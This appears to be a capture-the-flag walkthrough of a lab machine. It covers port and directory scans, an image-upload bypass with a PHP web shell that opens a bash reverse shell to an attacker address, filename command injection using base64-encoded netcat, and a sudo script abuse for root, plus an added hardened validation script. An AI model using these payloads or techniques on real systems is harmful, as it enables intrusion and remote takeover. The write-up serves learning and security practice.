Basic information

Port scan

Ports 22 and 80 are open:

➜  ~ nmap -sC -sV 10.10.10.146
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-30 01:56 EST
Warning: 10.10.10.146 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.146
Host is up (0.070s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
| 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_ 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

Port 80

Port 80 serves only a short piece of text:

Directory scan

A simple directory scan finds backup and uploads:

gobuster dir -u http://10.10.10.146/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50

/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/backup (Status: 301)
/cgi-bin/ (Status: 403)
/index.php (Status: 200)
/uploads (Status: 301)

backup

backup contains a tar archive holding four PHP files:

upload && shell

upload is a file upload form. According to the code in backup, it checks the file extension and the file header so that only images can be uploaded, but the header check relies on PHP's finfo_file function, which is easy to bypass:

Photo.php lists the uploaded files:

shell.gif

GIF89a;
<?php
system("bash -c 'exec bash -i &>/dev/tcp/10.10.14.10/4445 <&1'");
?>

reverse shell

Then request the uploaded file to trigger the reverse shell:

guly

In guly's home directory there is a check_attack.php. Reading the code shows that it scans and processes the uploads directory, and it contains an obvious command injection:

exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");

value is the file name, which we control.

Command injection

Passing the command directly to touch is problematic, so it can be base64-encoded instead:

echo "nc -e /bin/bash 10.10.14.10 4446" | base64
bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjEwIDQ0NDYK
touch '; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjEwIDQ0NDYK | base64 -d | sh; b'

guly shell

Then wait for the check to run and a shell as guly comes back:

check_attack.php

<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
    $msg='';
    if ($value == 'index.html') {
        continue;
    }
    #echo "-------------\n";

    #print "check: $value\n";
    list ($name,$ext) = getnameCheck($value);
    $check = check_ip($name,$value);

    if (!($check[0])) {
        echo "attack!\n";
        # todo: attach file
        file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

        exec("rm -f $logpath");
        exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
        echo "rm -f $path$value\n";
        mail($to, $msg, $msg, $headers, "-F$value");
    }
}

?>

user flag

user.txt is in guly's home directory:

Privilege escalation information

sudo -l reveals changename.sh:

Reading the code, it just writes an ifcfg file, prompting for a few variables:

Because of this, arbitrary commands can be executed through those variables.

changename.sh

#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
    echo "interface $var:"
    read x
    while [[ ! $x =~ $regexp ]]; do
        echo "wrong input, try again"
        echo "interface $var:"
        read x
    done
    echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done

/sbin/ifup guly0
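The weak point in changename.sh is the regexp: it accepts spaces and slashes, and the value is then written unquoted into ifcfg-guly, a file that ifup sources as shell. Below is an added example, not part of the original script, showing the stricter validation and quoted write a fixed version would use; the names strict pattern, validate_value, render_line and write_ifcfg are my own, and the file path in write_ifcfg is a parameter rather than the real network-scripts path.

```bash
#!/bin/bash
# Added defensive example, not the original changename.sh.
# The original pattern "^[a-zA-Z0-9_\ /-]+$" accepts spaces, so a value such
# as "a b" becomes NAME=a followed by a separate shell word when ifup sources
# the file. The validator below only allows characters that can neither split
# a word nor escape a single-quoted string, and rejects empty/overlong input.

max_len=64

# validate_value VALUE -> 0 if VALUE is safe to write into an ifcfg file, else 1
# (uses case so that embedded newlines are rejected as well)
validate_value() {
    local x="$1"
    [ -n "$x" ] || return 1
    [ "${#x}" -le "$max_len" ] || return 1
    case $x in
        *[!a-zA-Z0-9_-]*) return 1 ;;
    esac
    return 0
}

# render_line VAR VALUE -> prints VAR='VALUE', or returns 1 if either is unsafe
render_line() {
    local var="$1" x="$2"
    validate_value "$var" || return 1
    validate_value "$x" || return 1
    printf "%s='%s'\n" "$var" "$x"
}

# write_ifcfg FILE VAR VALUE [VAR VALUE ...] -> appends validated, quoted
# assignments to FILE and stops at the first rejected pair (constructed usage;
# the real script writes /etc/sysconfig/network-scripts/ifcfg-guly)
write_ifcfg() {
    local file="$1"; shift
    local var x line
    while [ "$#" -ge 2 ]; do
        var="$1"; x="$2"; shift 2
        line=$(render_line "$var" "$x") || { echo "rejected value for $var" >&2; return 1; }
        printf '%s\n' "$line" >> "$file"
    done
}
```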

Privilege escalation && root flag

So we can simply run bash through it and get root:

References